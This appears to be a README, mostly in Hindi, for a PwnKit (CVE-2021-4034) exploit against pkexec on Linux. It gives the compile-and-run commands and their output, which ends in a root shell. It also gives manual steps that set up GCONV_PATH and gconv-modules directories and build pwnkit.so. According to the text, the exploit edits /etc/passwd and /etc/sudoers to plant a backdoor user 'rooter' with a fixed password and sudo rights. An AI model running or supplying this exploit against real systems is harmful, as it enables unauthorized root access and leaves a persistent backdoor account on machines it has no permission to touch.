
CVE-2021-4034 (pkexec) के लिए एक्सप्लॉइट जो sudo विशेषाधिकारों के साथ एक रूट उपयोगकर्ता जोड़ता है। इसमें मैन्युअल एक्सप्लॉइटेशन चरण शामिल हैं और स्थानीय विशेषाधिकार वृद्धि के लिए pwnkit.so संकलित करता है।
CVE-2021-4034 Add Root User - Pkexec Local Privilege Escalation
CVE-2021-4034 के आधार पर संवर्धित, Exploit निष्पादित करने पर डिफ़ॉल्ट रूप से उपयोगकर्ता नाम rooter, पासवर्ड Hello@World जोड़ा जाएगा, और rooter उपयोगकर्ता के पास sudo विशेषाधिकार होंगे।
Refer to CVE-2021-4034, executing Exploit will add username rooter, password Hello@World by default, and The rooter user will have sudo privileges.
test@some:~$ gcc cve-2021-4034.c -o ./exp
test@some:~$ ./exp
/etc/passwd successfully backed up to /tmp/passwd.bak
File Open successed!
[+]Change sudoers priv.
/etc/sudoers successfully backed up to /tmp/sudoers.bak
File Open successed!
[+]Add Root User Success...
test@some:~$ su rooter
Password:
root@some:/home/test# id
uid=0(root) gid=0(root) groups=0(root)
root@some:/home/test#
यदि लक्ष्य वातावरण में gcc उपलब्ध नहीं है, तो कमांड मैन्युअल रूप से निष्पादित करें, और pwnkit.so को स्थानीय रूप से संकलित करें।
$ mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'
$ mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules
$ mkdir pwnkit
$ gcc pwnkit.so.c -o pwnkit/pwnkit.so -lcrypt -shared -fPIC
$ gcc pkexec.c -o pkexec
$ ./pkexec
/etc/passwd successfully backed up to /tmp/passwd.bak
File Open successed!
[+]Change sudoers priv.
/etc/sudoers successfully backed up to /tmp/sudoers.bak
File Open successed!
[+]Add Root User Success...